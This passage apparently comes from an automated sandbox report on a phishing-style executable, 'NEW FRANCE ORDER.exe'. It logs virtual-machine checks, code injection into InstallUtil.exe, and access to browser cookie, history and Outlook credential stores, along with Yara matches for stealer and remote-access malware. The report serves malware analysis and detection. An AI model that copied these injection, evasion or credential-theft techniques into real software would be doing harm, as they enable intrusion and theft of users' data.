Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593578
Source: InstallUtil.exe, 00000007.00000002.2419801823.0000000001652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT<h
Source: IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: InstallUtil.exe, 0000000B.00000002.2419510014.0000000001268000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll="Sy
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43A000
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 100E008
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43A000
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C86008
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\IsSingleByte.exe "C:\Users\user\AppData\Roaming\IsSingleByte.exe"
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Queries volume information: C:\Users\user\Desktop\NEW FRANCE ORDER.exe VolumeInformation
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Queries volume information: C:\Users\user\AppData\Roaming\IsSingleByte.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7476, type: MEMORYSTR
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2422846155.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7476, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7476, type: MEMORYSTR
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2422846155.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR